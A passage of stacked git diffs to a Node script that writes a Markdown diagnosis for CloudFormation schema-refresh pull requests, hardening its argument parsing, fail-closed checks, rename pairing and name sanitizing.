- * research IS largely mechanical and is now done above; what is left to a human
- * is confirmation plus the cases the evidence cannot separate — a rename looks
- * exactly like a removal at the name level (hence this repo's hand-maintained
- * rename maps), and `no-sdk-member` cannot tell "unsupported" from "the
- * installed SDK lags the service".
- *
- * The reason to stop there is the asymmetry rather than the ambiguity: the
- * silencing option (`bogusTolerated`, `NESTED_KEY_ALLOW_LIST`) is always
- * available and always turns CI green, so anything choosing automatically under
- * uncertainty converges on it — disabling the very check that caught the
- * problem, silently. Evidence shortens the human's work; it does not change who
- * accepts that risk.
- *
- * The input shape lives in the sibling `.d.mts` and is named here rather than
- * restated field by field: the per-field `@param` list was a second copy, and
- * it went stale twice — silently, since nothing in CI type-checks `scripts/**
  * What to do about each CI check a schema refresh can turn red.
  *
- * Keyed by the `vp run` task name, so the workflow and this table name the same
- * thing. Every entry here is a check that READS `tests/fixtures/cfn-schemas/`
- * and hard-fails CI, which is what makes its silence expensive: two of the
- * three are reddened by a pure schema ADDITION, the shape a reader is most
- * likely to wave through.
+ * Keyed by the name the workflow's `run_check` reports, so the two sides name
+ * the same thing — the `vp run` task for the audits, a bare `property-coverage`
+ * for the vitest filter.
+ *
+ * Every entry READS `tests/fixtures/cfn-schemas/` and hard-fails CI, and every
+ * one of them is reddened by a pure schema ADDITION — the shape a reader is
+ * most likely to wave through, which is what makes the silence expensive.
  *
  * A check absent from this table still gets a section — naming it and saying
  * there is no guidance beats the silence that shipped for six rounds.
@@ -644,6 +622,19 @@ export const CHECK_GUIDANCE = {
     'is Cloud-Control-routed — check whether its `primaryIdentifier` already',
     'covers it.',
   ],
+  'fixture-consumer-tests': [
+    'A unit test that reads the schema fixtures directly and asserts something',
+    'about their contents — a mutually-exclusive-properties rule naming a',
+    'property that is gone, or an ECS subfield list the capture no longer',
+    'matches.',
+    '',
+    '```bash',
+    'vp test run mutually-exclusive-properties ecs-deployment-configuration-subfield ecs-service-config-props',
+    '```',
+    '',
+    'Each asserts a fact about a specific type. Read what it names and decide',
+    'whether the rule or the assertion is what AWS just invalidated.',
+  ],
   'audit:enrichment-coverage:check': [
     'A new computed attribute on a pure Cloud-Control type that',
     '`enrichResourceAttributes` does not populate — the silent-drop class on the',
@@ -659,7 +650,31 @@ export const CHECK_GUIDANCE = {
   ],
 };
 
-/**`.
+
+/**
+ * Render the Markdown appended to the pull-request body.
+ *
+ * It NAMES what fired, where, and what the SDK says about it — then stops.
+ *
+ * The stopping point is narrower than it first looks, and the earlier framing
+ * of it here was wrong: "the tiebreaker is in neither model" ignored that AWS
+ * publishes a THIRD description, the SDK, which this repo already reads. So the
+ * research IS largely mechanical and is now done above; what is left to a human
+ * is confirmation plus the cases the evidence cannot separate — a rename looks
+ * exactly like a removal at the name level (hence this repo's hand-maintained
+ * rename maps), and `no-sdk-member` cannot tell "unsupported" from "the
+ * installed SDK lags the service".
+ *
+ * The reason to stop there is the asymmetry rather than the ambiguity: the
+ * silencing option (`bogusTolerated`, `NESTED_KEY_ALLOW_LIST`) is always
+ * available and always turns CI green, so anything choosing automatically under
+ * uncertainty converges on it — disabling the very check that caught the
+ * problem, silently. Evidence shortens the human's work; it does not change who
+ * accepts that risk.
+ *
+ * The input shape lives in the sibling `.d.mts` and is named here rather than
+ * restated field by field: the per-field `@param` list was a second copy, and
+ * it went stale twice — silently, since nothing in CI type-checks `scripts/**`.
  *
  * @param {DiagnosisInput} input
  * @returns {string}
@@ -820,7 +835,12 @@ export function renderDiagnosis(input) {
     lines.push('### CI checks that FAILED — a decision is needed', '');
     for (const check of failedChecks) {
       const guidance = CHECK_GUIDANCE[check];
-      lines.push(`#### \`${renderName(check)}\``, '');
+      // `renderKey`, not `renderName`: a task name carries hyphens and
+      // `renderName`'s class excludes them, so every heading rendered as the
+      // rejection placeholder — the section that exists to say WHICH check
+      // failed naming none of them. Identical to the defect one section down,
+      // one round earlier. `renderKey` adds its own backticks.
+      lines.push(`#### ${renderKey(check)}`, '');
       lines.push(
         ...(guidance ?? [
           'This report carries no guidance for that check — read its job log.',
@@ -1147,6 +1167,24 @@ function divergenceProcedure(divergences, sdkLag) {
 }
 
 /**
+ * Whether a failed `git show HEAD:<path>` means "brand-new fixture" or "could
+ * not read".
+ *
+ * Exported because the distinction is the whole point and it was wrong: the
+ * first cut also matched `unknown revision` and `invalid object`, which are
+ * whole-REVISION failures — an unborn HEAD reports
+ * `fatal: invalid object name 'HEAD'` — so a broken repository made every
+ * fixture look brand-new and the whole refresh look clean. Neither pattern can
+ * match a genuine path-not-in-HEAD, which says `does not exist in 'HEAD'`.
+ *
+ * @param {string} stderr
+ * @returns {undefined | typeof UNREADABLE} `undefined` = not in HEAD
+ */
+export function classifyGitShowFailure(stderr) {
+  return /does not exist|exists on disk, but not in/i.test(stderr) ? undefined : UNREADABLE;
+}
+
+/**
  * Read a type's committed fixture from git, or `undefined` when it is new.
  *
  * @param {string} relPath
@@ -1166,11 +1204,15 @@ function committedVersion(relPath) {
     // look new and the whole refresh look clean. Measured: every file
     // undefined yields the clean verdict, over a step that only runs when
     // drift exists.
-    const stderr = String(error?.stderr ?? '');
-    if (/does not exist|exists on disk, but not in|unknown revision|invalid object/i.test(stderr)) {
-      return undefined;
-    }
-    return UNREADABLE;
+    //
+    // Only the PATH-shaped failures mean "brand-new fixture". `unknown
+    // revision` and `invalid object` are whole-REVISION failures — an unborn
+    // HEAD reports `fatal: invalid object name 'HEAD'` — and matching them made
+    // every fixture look new and the whole refresh look clean, which is the
+    // exact fail-open this function was changed to close. Measured: neither can
+    // ever match a genuine path-not-in-HEAD, which says
+    // `does not exist in 'HEAD'`.
+    return classifyGitShowFailure(String(error?.stderr ?? ''));
   }
 }
 

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -55,7 +55,7 @@
  */
 
 import { execFileSync } from 'node:child_process';
-import { readFileSync, readdirSync, existsSync } from 'node:fs';
+import { readFileSync, readdirSync, existsSync, statSync } from 'node:fs';
 import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
 
@@ -642,8 +642,8 @@ export const CHECK_GUIDANCE = {
     '',
     'Read what it names and decide whether the rule or the assertion is what AWS',
     'just invalidated. That command is the workflow\'s own filter list, fenced',
-    'equal to it — a narrower one comes back GREEN over a real red, which is how',
-    'this row was wrong for a round.',
+    'equal to it line by line — a narrower one comes back GREEN over a real red,',
+    'which is how this row was wrong for a round, twice.',
   ],
   'audit:enrichment-coverage:check': [
     'A new computed attribute on a pure Cloud-Control type that',
@@ -1316,69 +1316,69 @@ export function collectFixtureDeltas({
   let readOnlyAddedCount = 0;
 
   for (const file of files) {
-      const committed = committedOf(file);
-      if (committed === UNREADABLE) {
-        unreadable.push(file);
-        continue;
-      }
-      if (committed === undefined) continue; // Brand-new fixture: nothing to compare.
-      let delta;
-      let resourceType;
-      try {
-        delta = comparePropertySets(committed, currentOf(file));
-        // The filename stem converted back, never the raw stem: it is hyphenated
+    const committed = committedOf(file);
+    if (committed === UNREADABLE) {
+      unreadable.push(file);
+      continue;
+    }
+    if (committed === undefined) continue; // Brand-new fixture: nothing to compare.
+    let delta;
+    let resourceType;
+    try {
+      delta = comparePropertySets(committed, currentOf(file));
+      // The filename stem converted back, never the raw stem: it is hyphenated
       // and `renderName` rejects hyphens, so the fallback rendered
       // `**[name rejected]**` as the heading — the same shape as the two render
       // sites rounds 8 and 9 fixed. The declared-property lookup misses either
       // way, but a legible heading says which type it missed for.
-        resourceType =
-          JSON.parse(committed).resourceType ?? file.replace(/\.json$/, '').replace(/-/g, '::');
-      } catch {
-        // An unparseable side is the refresh's problem, not the report's — but it
-        // is COUNTED, because a type that vanishes here vanishes from the removal
-        // AND the addition accounting, and the residue can be "additions only".
-        // The other two parsers grew shortfall counters in earlier rounds; this
-        // one was the last silent skip.
-        unreadable.push(file);
-        continue;
-      }
+      resourceType =
+        JSON.parse(committed).resourceType ?? file.replace(/\.json$/, '').replace(/-/g, '::');
+    } catch {
+      // An unparseable side is the refresh's problem, not the report's — but it
+      // is COUNTED, because a type that vanishes here vanishes from the removal
+      // AND the addition accounting, and the residue can be "additions only".
+      // The other two parsers grew shortfall counters in earlier rounds; this
+      // one was the last silent skip.
+      unreadable.push(file);
+      continue;
+    }
 
-      readOnlyAddedCount += delta.added.length - delta.writableAdded.length;
+    readOnlyAddedCount += delta.added.length - delta.writableAdded.length;
 
-      const providerRelPath = providerFiles.get(resourceType);
-      const declaredHere = declared.get(resourceType) ?? new Set();
-      const actionable = delta.removed.filter((/** @type {string} */ p) => declaredHere.has(p));
-      if (actionable.length > 0) {
-        /** @type {Record<string, string[]>} */
-        const candidates = {};
-        /** @type {Record<string, SdkEvidence | undefined>} */
-        const sdk = {};
-        /** @type {Record<string, string[]>} */
-        const renameCandidates = {};
-        for (const property of actionable) {
-          candidates[property] = declarationCandidates(property, providerRelPath, resourceType);
-          sdk[property] = sdkEvidence(property, providerRelPath);
-          // Writable additions that plausibly ARE this property renamed —
-          // one name containing the other. Unconditional pairing asserted a
-          // rename for every unrelated addition, and with two removals and one
-          // addition it claimed both, of which at most one can be true.
-          // Read-only additions are excluded outright: a declaration cannot
-          // target one, so "point the declaration at the new name" would just
-          // produce the next bogus entry.
-          renameCandidates[property] = pairRenames(property, delta.writableAdded);
-        }
-        removed.push({
-          resourceType,
-          properties: actionable,
-          candidates,
-          sdk,
-          renameCandidates,
-          providerPath: providerRelPath,
-        });
+    const providerRelPath = providerFiles.get(resourceType);
+    const declaredHere = declared.get(resourceType) ?? new Set();
+    const actionable = delta.removed.filter((/** @type {string} */ p) => declaredHere.has(p));
+    if (actionable.length > 0) {
+      /** @type {Record<string, string[]>} */
+      const candidates = {};
+      /** @type {Record<string, SdkEvidence | undefined>} */
+      const sdk = {};
+      /** @type {Record<string, string[]>} */
+      const renameCandidates = {};
+      for (const property of actionable) {
+        candidates[property] = declarationCandidates(property, providerRelPath, resourceType);
+        sdk[property] = sdkEvidence(property, providerRelPath);
+        // Writable additions that plausibly ARE this property renamed —
+        // one name containing the other. Unconditional pairing asserted a
+        // rename for every unrelated addition, and with two removals and one
+        // addition it claimed both, of which at most one can be true.
+        // Read-only additions are excluded outright: a declaration cannot
+        // target one, so "point the declaration at the new name" would just
+        // produce the next bogus entry.
+        renameCandidates[property] = pairRenames(property, delta.writableAdded);
       }
-      if (delta.writableAdded.length > 0) {
-        writableAdded.push({ resourceType, properties: delta.writableAdded });
-      }
+      removed.push({
+        resourceType,
+        properties: actionable,
+        candidates,
+        sdk,
+        renameCandidates,
+        providerPath: providerRelPath,
+      });
+    }
+    if (delta.writableAdded.length > 0) {
+      writableAdded.push({ resourceType, properties: delta.writableAdded });
+    }
     }
 
   return { removed, writableAdded, readOnlyAddedCount, unreadable };
@@ -1417,15 +1417,43 @@ function main() {
   // `--nested-key-log` is rescued by its `--nested-key-rc` companion, but
   // `--skipped-log` has none and the section is omitted when empty — so an
   // unread log was byte-identical to "everything was refreshed".
-  const readArg = (/** @type {string} */ flag) => {
+  /**
+   * The raw value of a flag, in either spelling, or `undefined` when absent.
+   *
+   * `--flag=value` was invisible to all three readers: `args.indexOf(flag)`
+   * returns -1, so a mistyped invocation fell through to each reader's
+   * absent-flag arm — `''` for the log readers and 0 ("the checker succeeded")
+   * for the status one. Only the workflow's space form held it shut, and the
+   * fence for THAT accepted `--skipped-log=...` too.
+   *
+   * A value that is itself a flag is no value at all, in either dash spelling:
+   * the guard covered `--x` only, so `--failed-checks -property-coverage`
+   * fabricated a failed check named `-property-coverage`.
+   */
+  const rawArg = (/** @type {string} */ flag) => {
+    const glued = args.find((a) => a.startsWith(`${flag}=`));
+    if (glued !== undefined) return glued.slice(flag.length + 1);
     const i = args.indexOf(flag);
-    if (i === -1) return '';
-    const path = args[i + 1];
-    if (path === undefined || path.startsWith('--')) {
+    if (i === -1) return undefined;
+    const value = args[i + 1];
+    return value === undefined || /^-/.test(value) ? null : value;
+  };
+
+  const readArg = (/** @type {string} */ flag) => {
+    const path = rawArg(flag);
+    if (path === undefined) return '';
+    if (path === null || path === '') {
       throw new Error(`${flag} was given with no value — refusing to report from an unread file.`);
     }
     if (!existsSync(path)) {
-      throw new Error(`${flag} names ${path}, which does not exist — refusing to report from an unread file.`);
+      throw new Error(
+        `${flag} names ${path}, which does not exist — refusing to report from an unread file.`
+      );
+    }
+    if (statSync(path).isDirectory()) {
+      throw new Error(
+        `${flag} names ${path}, which is a directory — refusing to report from an unread file.`
+      );
     }
     return readFileSync(path, 'utf8');
   };
@@ -1467,27 +1495,17 @@ function main() {
   // distinction `readNumArg` draws, and its twin here fails open the same way:
   // an empty list reads as "nothing failed".
   const readArgValue = (/** @type {string} */ flag) => {
-    const i = args.indexOf(flag);
-    if (i === -1) return '';
-    // `undefined` is only the TRAILING spelling. A following FLAG is the same
-    // mistake and read as a value: `--failed-checks --skipped-log <f>`
-    // fabricated a failed check named `--skipped-log`.
-    const raw = args[i + 1];
-    if (raw === undefined || raw.startsWith('--')) {
+    const raw = rawArg(flag);
+    if (raw === undefined) return '';
+    if (raw === null) {
       throw new Error(`${flag} was given with no value — refusing to report from an unread list.`);
     }
     return raw;
   };
   const readNumArg = (/** @type {string} */ flag) => {
-    const i = args.indexOf(flag);
-    if (i === -1) return 0;
-    // A flag that IS present must carry a readable value. `Number('')` and
-    // `Number(' ')` are both 0 — "the checker succeeded" — so the empty, the
-    // whitespace and the trailing-flag spellings all failed OPEN while only
-    // NaN failed closed. Three spellings of the same defect this file has now
-    // shipped twice.
-    const raw = args[i + 1];
-    if (raw === undefined || raw.trim() === '') return 1;
+    const raw = rawArg(flag);
+    if (raw === undefined) return 0;
+    if (raw === null || raw.trim() === '') return 1;
     const n = Number(raw);
     return Number.isFinite(n) ? n : 1;
   };

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -37,7 +37,7 @@
  *
  *   node scripts/diagnose-schema-refresh.mjs \
  *     [--nested-key-log <file>] [--nested-key-rc <status>] \
- *     [--failed-checks <a,b>] [--skipped-log <file>] > body.md
+ *     [--failed-checks <a,b>] [--skipped-log <file>] [--fixtures-dir <dir>] > body.md
  *
  * `--nested-key-log` is the captured output of
  * `vp run audit:nested-key-coverage:check` and `--nested-key-rc` its exit
@@ -47,8 +47,13 @@
  * watched succeed. `--failed-checks` is the comma-separated list of CI checks
  * that came back red — every one of them fixture-driven, and every one reached
  * by an ordinary schema ADDITION. `--skipped-log` is the tail of the refresh's
- * own output,
- * listing the types the public bundle does not carry.
+ * own output, listing the types the public bundle does not carry.
+ *
+ * `--fixtures-dir` is a TEST SEAM — it points the comparison at a scratch
+ * directory so the empty-listing refusal is reachable from a test, the same
+ * shape `gen-nested-key-coverage.ts` uses for `--providers-dir=`. Documented
+ * rather than hidden because the synopsis and the accepted flag set are fenced
+ * EQUAL, and an undocumented flag is exactly how that fence goes stale.
  *
  * Emits Markdown on stdout and always exits 0 — a diagnosis that fails must
  * not take down the PR it is describing.
@@ -1432,6 +1437,8 @@ export const KNOWN_FLAGS = [
   '--nested-key-rc',
   '--failed-checks',
   '--skipped-log',
+  // Test seam; see its use below.
+  '--fixtures-dir',
 ];
 
 /**
@@ -1460,7 +1467,9 @@ export function assertFixtureFloor(fixtureCount, declaredCount) {
         'directory this run never read.'
     );
   }
-  if (declaredCount > 0 && fixtureCount * 2 < declaredCount) {
+  // No `declaredCount > 0` guard: `fixtureCount * 2 < 0` is unreachable for a
+  // non-negative count, so it was dead code whose case could not fail.
+  if (fixtureCount * 2 < declaredCount) {
     throw new Error(
       `only ${fixtureCount} schema fixtures against ${declaredCount} declared types — ` +
         'refusing to report from a listing this far short of the coverage table.'
@@ -1597,14 +1606,22 @@ function main() {
   // is still listed there — which is exactly the "now bogus" condition.
   const declared = loadDeclaredProperties();
 
-  const fixtureFiles = readdirSync(FIXTURES_DIR).filter(
+  // `--fixtures-dir=` is a TEST SEAM, the same shape `gen-nested-key-coverage.ts`
+  // uses for `--providers-dir=`. It exists because the floor's call site was
+  // otherwise unreachable and got covered by a source-shape assertion instead —
+  // and that assertion could not see the call wrapped in `try {} catch {}`,
+  // which measured as printing the exact clean verdict the floor exists to
+  // prevent. A seam that makes the real path testable beats a fence over its
+  // spelling.
+  const fixturesDir = rawArg('--fixtures-dir') || FIXTURES_DIR;
+  const fixtureFiles = readdirSync(fixturesDir).filter(
     (f) => f.endsWith('.json') && !f.startsWith('_')
   );
   assertFixtureFloor(fixtureFiles.length, declared.size);
   const { removed, writableAdded, readOnlyAddedCount, unreadable } = collectFixtureDeltas({
     files: fixtureFiles,
     committedOf: (file) => committedVersion(`tests/fixtures/cfn-schemas/${file}`),
-    currentOf: (file) => readFileSync(join(FIXTURES_DIR, file), 'utf8'),
+    currentOf: (file) => readFileSync(join(fixturesDir, file), 'utf8'),
     providerFiles,
     declared,
   });

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -110,7 +110,12 @@ export function parseNestedKeyDivergences(checkOutput) {
     if (!m) continue;
     out.push({ resourceType: m[1], bucket: m[2], line });
   }
-  if (out.length === 0 && /nested-key-coverage:\s*FAIL/i.test(checkOutput)) {
+  // Scoped to the DIVERGENCE failure. The checker has three other FAIL modes
+  // (stale allow-list / segmentRenames / terminalRenames) that legitimately
+  // print no finding line, and refusing on those made `main()` discard the
+  // whole diagnosis — losing the removal and addition sections too — while
+  // blaming a format change that had not happened.
+  if (out.length === 0 && /nested-key-coverage:\s*FAIL\s*—\s*nested CFn/i.test(checkOutput)) {
     throw new Error(
       'audit:nested-key-coverage:check reported FAIL but no finding line parsed — ' +
         'its output format changed. Refusing to report "nothing needs a decision" ' +
@@ -273,8 +278,8 @@ export function sdkModelsMember(property, providerRelPath, repoRoot = REPO_ROOT)
   if (clients.length === 0) return undefined;
 
   const needle = new RegExp(`\\b${property}\\b`, 'i');
-  /** @type {string | undefined} */
-  let firstVersion;
+  /** @type {Record<string, string | undefined>} */
+  const versions = {};
   /** @type {string[]} */
   const consulted = [];
   for (const client of clients) {
@@ -289,7 +294,7 @@ export function sdkModelsMember(property, providerRelPath, repoRoot = REPO_ROOT)
     } catch {
       version = undefined;
     }
-    firstVersion ??= version;
+    versions[client] = version;
     for (const file of readdirSync(modelsDir).filter((f) => f.endsWith('.d.ts'))) {
       if (needle.test(readFileSync(join(modelsDir, file), 'utf8'))) {
         return { client, modelled: true, version, consulted };
@@ -297,7 +302,11 @@ export function sdkModelsMember(property, providerRelPath, repoRoot = REPO_ROOT)
     }
   }
   if (consulted.length === 0) return undefined;
-  return { client: consulted[0], modelled: false, version: firstVersion, consulted };
+  // The version reported belongs to the client reported. Falling back to a
+  // "first version seen" would pair one client's name with another's number —
+  // the same misattribution class as the cross-service lookup this function was
+  // rewritten to close.
+  return { client: consulted[0], modelled: false, version: versions[consulted[0]], consulted };
 }
 
 /**
@@ -330,7 +339,7 @@ export function sdkVersionLag(client, installed, viewLatest = defaultViewLatest)
   } catch {
     return undefined;
   }
-  if (!/^\d+\.\d+\.\d+/.test(latest)) return undefined;
+  if (!/^\d+\.\d+\.\d+[\w.+-]*$/.test(latest)) return undefined;
   return { installed, latest, behind: latest !== installed };
 }
 
@@ -366,10 +375,37 @@ export function parseDeclaredProperties(generatedSource) {
   /** @type {Map<string, Set<string>>} */
   const declared = new Map();
   if (generatedSource.trim() === '') return declared;
-  for (const m of generatedSource.matchAll(
-    /\[\s*'([A-Z][\w:]+)'\s*,\s*\{[\s\S]*?handled:\s*new Set(?:<[^>]*>)?\(\[([\s\S]*?)\]\)/g
-  )) {
-    declared.set(m[1], new Set([...m[2].matchAll(/'([^']+)'/g)].map((x) => x[1])));
+
+  // Entries are located FIRST, then `handled:` is matched inside each one.
+  // A single pattern spanning both cannot work: a type whose set is empty is
+  // written `new Set<string>()` with no `[`, so a lazy `[\s\S]*?` skips past it
+  // and credits the NEXT type's properties. Measured against the real module:
+  // 134 entries, 131 parsed, three swallowed and two mis-credited — including
+  // `AWS::CloudFormation::WaitConditionHandle` inheriting CloudFront's. The
+  // consequence is the silent-empty class at PER-TYPE granularity: a removal on
+  // a swallowed type renders "nothing needs a decision" over a red check, and
+  // the whole-map refusal below cannot see it.
+  const boundaries = [...generatedSource.matchAll(/\[\s*'([A-Z][\w:]+)'\s*,\s*\{/g)];
+  for (let i = 0; i < boundaries.length; i++) {
+    const slice = generatedSource.slice(
+      boundaries[i].index,
+      i + 1 < boundaries.length ? boundaries[i + 1].index : undefined
+    );
+    const handled = /handled:\s*new Set(?:<[^>]*>)?\(\s*\[([\s\S]*?)\]\s*\)/.exec(slice);
+    declared.set(
+      boundaries[i][1],
+      new Set(handled ? [...handled[1].matchAll(/'([^']+)'/g)].map((x) => x[1]) : [])
+    );
+  }
+
+  // Refuses on a SHORTFALL, not just on zero. The zero-only form was blind to
+  // exactly the defect above, where 131 of 134 parsed and the report looked
+  // healthy.
+  if (declared.size !== boundaries.length || (boundaries.length === 0 && generatedSource.includes('PROPERTY_COVERAGE_BY_TYPE'))) {
+    throw new Error(
+      `property-coverage.generated.ts: parsed ${declared.size} of ${boundaries.length} ` +
+        'type entries — the shape changed. Refusing to report from a partial parse.'
+    );
   }
   if (declared.size === 0) {
     throw new Error(
@@ -402,10 +438,10 @@ export function parseDeclaredProperties(generatedSource) {
  * accepts that risk.
  *
  * @param {object} input
- * @param {Array<{resourceType: string, properties: string[], candidates: Record<string, string[]>, sdk?: Record<string, {client: string, modelled: boolean, version?: string} | undefined>, renameCandidates?: Record<string, string[]>}>} input.removed
+ * @param {Array<{resourceType: string, properties: string[], candidates: Record<string, string[]>, sdk?: Record<string, {client: string, modelled: boolean, version?: string} | undefined>, renameCandidates?: Record<string, string[]>, providerPath?: string}>} input.removed
  * @param {Array<{resourceType: string, properties: string[]}>} input.writableAdded
  * @param {number} [input.readOnlyAddedCount]
- * @param {{client: string, installed: string, latest: string, behind: boolean}} [input.sdkLag]
+ * @param {{client: string, resourceType: string, installed: string, latest: string, behind: boolean}} [input.sdkLag]
  * @param {Array<{resourceType: string, bucket: string, line: string}>} input.divergences
  * @param {string[]} input.skipped
  * @returns {string}
@@ -434,14 +470,17 @@ export function renderDiagnosis({
       ''
     );
     for (const entry of removed) {
-      lines.push(`- \`${entry.resourceType}\``);
+      lines.push(`- ${renderName(entry.resourceType)}`);
       for (const property of entry.properties) {
         const candidates = entry.candidates[property] ?? [];
         const where =
-          candidates.length === 0
-            ? 'no declaration found in the provider sources'
-            : `declared near ${candidates.map((c) => `\`${c}\``).join(', ')}`;
-        lines.push(`  - \`${property}\` — ${where}`);
+          candidates.length > 0
+            ? `declared near ${candidates.map((c) => `\`${c}\``).join(', ')}`
+            : entry.providerPath
+              ? `not found in \`${entry.providerPath}\` — the declaration may sit outside ` +
+                'the block scanned for this type'
+              : 'the provider serving this type could not be determined';
+        lines.push(`  - ${renderName(property)} — ${where}`);
 
         // A RENAME shows up as a removal and an addition on the SAME type in
         // the SAME refresh, and both sides are in hand — so say so rather than
@@ -451,7 +490,7 @@ export function renderDiagnosis({
         if (renames.length > 0) {
           lines.push(
             `    - **Likely a RENAME**: this refresh also ADDED ` +
-              `${renames.map((r) => `\`${r}\``).join(', ')} to the same type. If so, ` +
+              `${renames.map(renderName).join(', ')} to the same type. If so, ` +
               'update the declaration to the new name rather than retiring it.'
           );
         }
@@ -507,7 +546,7 @@ export function renderDiagnosis({
     );
     for (const entry of writableAdded) {
       lines.push(
-        `- \`${entry.resourceType}\`: ${entry.properties.map((p) => `\`${p}\``).join(', ')}`
+        `- ${renderName(entry.resourceType)}: ${entry.properties.map(renderName).join(', ')}`
       );
     }
     lines.push('');
@@ -532,7 +571,7 @@ export function renderDiagnosis({
       'No entry in the public bundle; these keep the authenticated path as their',
       'only refresh route and were left untouched.',
       '',
-      ...skipped.map((t) => `- \`${t}\``),
+      ...skipped.map((t) => `- ${renderName(t)}`),
       ''
     );
   }
@@ -545,6 +584,63 @@ export function renderDiagnosis({
     '_[CFn schema refresh runbook](https://github.com/go-to-k/cdkd/blob/main/docs/schema-refresh-runbook.md)._'
   );
   return lines.join('\n');
+}
+
+/**
+ * The writable additions that plausibly ARE this property under a new name.
+ *
+ * Extracted so the pairing is testable on its own: with it inline in `main()`
+ * the only tests possible hand-fed the RESULT to the renderer, which meant
+ * reverting the rule to "every addition is a rename" left the whole suite
+ * green — the defect the suite claimed to close.
+ *
+ * Name similarity, deliberately, not equality: a rename is a guess here and the
+ * report says so. Read-only additions never reach this function, because a
+ * declaration cannot target one.
+ *
+ * @param {string} property
+ * @param {readonly string[]} writableAdded
+ * @returns {string[]}
+ */
+export function pairRenames(property, writableAdded) {
+  // PREFIX or SUFFIX, case-sensitively — not substring containment. A short
+  // name substring-matches almost anything: `Id` is inside
+  // `CapacityProviderConfiguration` (via "Prov-id-er"), so containment told the
+  // maintainer an unrelated addition was `Id` renamed. PascalCase makes the
+  // ends the meaningful boundaries: `RepositoryId` ends with `Id`,
+  // `GeoProximityLocationV2` starts with `GeoProximityLocation`.
+  return writableAdded.filter(
+    (a) =>
+      a !== property &&
+      (a.startsWith(property) ||
+        a.endsWith(property) ||
+        property.startsWith(a) ||
+        property.endsWith(a))
+  );
+}
+
+/**
+ * A property or type name rendered into Markdown, or a visible refusal.
+ *
+ * Property names come from the schema bundle, which this job documents as
+ * un-checksummable and TLS-trusted only. Interpolated raw into backticks they
+ * are Markdown: a crafted key closing the span and opening a heading can forge
+ * a "Nothing in this refresh needs a decision" verdict in the PR body AND in
+ * the umbrella issue comment — which attacks the human-review half of the very
+ * residual the workflow header accepts. Anything outside the character class a
+ * real CFn property uses is replaced by a loud marker rather than dropped
+ * silently, so a poisoned name is visible instead of merely absent.
+ *
+ * @param {string} name
+ * @returns {string}
+ */
+export function renderName(name) {
+  // `:` is in the class because this renders resource TYPES as well as property
+  // names, and `AWS::Service::Type` is the ordinary shape — omitting it
+  // rejected every legitimate type in the "Not refreshed" list.
+  return /^[A-Za-z0-9.:]+$/.test(name)
+    ? `\`${name}\``
+    : '**[name rejected: unexpected characters]**';
 }
 
 /**
@@ -564,8 +660,8 @@ function removedProcedure(removed) {
   return [
     '<details><summary>How to settle these</summary>',
     '',
-    '1. If a **RENAME** is flagged above, take that: point the declaration at the',
-    '   new name. Nothing else is needed.',
+    '1. If a **RENAME** is flagged above it is a NAME-SIMILARITY guess, not a',
+    '   finding — confirm with step 2 before repointing the declaration.',
     '2. Otherwise confirm against the live registry — this is the API AWS serves,',
     '   not the published bundle:',
     '',
@@ -602,12 +698,14 @@ function divergenceProcedure(divergences, lag) {
     lagLines.push(
       '',
       lag.behind
-        ? `**The installed \`${lag.client}\` is ${lag.installed}; npm publishes ` +
-          `${lag.latest}.** The SDK-lag reading is LIVE — bump and re-check before ` +
-          'allow-listing anything.'
-        : `**The installed \`${lag.client}\` is ${lag.installed}, which is current.** ` +
-          'The SDK-lag reading is ruled out; what remains is that the service ' +
-          'genuinely lacks the member.',
+        ? `**For ${renderName(lag.resourceType)} only**: the installed ` +
+          `\`${lag.client}\` is ${lag.installed}; npm publishes ${lag.latest}. The ` +
+          'SDK-lag reading is LIVE — bump and re-check before allow-listing anything. ' +
+          'Divergences on other services are NOT covered by this line.'
+        : `**For ${renderName(lag.resourceType)} only**: the installed ` +
+          `\`${lag.client}\` is ${lag.installed}, which is current, so the SDK-lag ` +
+          'reading is ruled out there. Divergences on other services are NOT covered ' +
+          'by this line.',
       ''
     );
   }
@@ -725,14 +823,23 @@ function main() {
       for (const property of actionable) {
         candidates[property] = findDeclarationCandidates(property, providerRelPath, resourceType);
         sdk[property] = sdkModelsMember(property, providerRelPath);
-        // The WRITABLE additions to the same type — not every addition. A
-        // declaration cannot target a read-only property (the coverage
-        // generator skips read-only when building the silent-drop set), so
-        // pairing a removal with a read-only addition would advise "point the
-        // declaration at the new name" and produce the next bogus entry.
-        renameCandidates[property] = delta.writableAdded;
+        // Writable additions that plausibly ARE this property renamed —
+        // one name containing the other. Unconditional pairing asserted a
+        // rename for every unrelated addition, and with two removals and one
+        // addition it claimed both, of which at most one can be true.
+        // Read-only additions are excluded outright: a declaration cannot
+        // target one, so "point the declaration at the new name" would just
+        // produce the next bogus entry.
+        renameCandidates[property] = pairRenames(property, delta.writableAdded);
       }
-      removed.push({ resourceType, properties: actionable, candidates, sdk, renameCandidates });
+      removed.push({
+        resourceType,
+        properties: actionable,
+        candidates,
+        sdk,
+        renameCandidates,
+        providerPath: providerRelPath,
+      });
     }
     if (delta.writableAdded.length > 0) {
       writableAdded.push({ resourceType, properties: delta.writableAdded });
@@ -758,7 +865,7 @@ function main() {
     );
     if (evidence) {
       const lag = sdkVersionLag(evidence.client, evidence.version);
-      if (lag) sdkLag = { client: evidence.client, ...lag };
+      if (lag) sdkLag = { client: evidence.client, resourceType: firstDivergent.resourceType, ...lag };
     }
   }
 

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -36,18 +36,18 @@
  * Usage (from the repo root, AFTER the refresh has written the fixtures):
  *
  *   node scripts/diagnose-schema-refresh.mjs \
- *     [--nested-key-log <file>] [--nested-key-rc <status>] \\
- *     [--property-coverage-rc <status>] [--skipped-log <file>] > body.md
+ *     [--nested-key-log <file>] [--nested-key-rc <status>] \
+ *     [--failed-checks <a,b>] [--skipped-log <file>] > body.md
  *
  * `--nested-key-log` is the captured output of
  * `vp run audit:nested-key-coverage:check` and `--nested-key-rc` its exit
  * status. The status is what tells a checker that FAILED silently from one that
  * found nothing, so the workflow always passes it; omitted, it is assumed to be
  * 0, which is the right default for a by-hand run against a checker you just
- * watched succeed. `--property-coverage-rc` is the same for
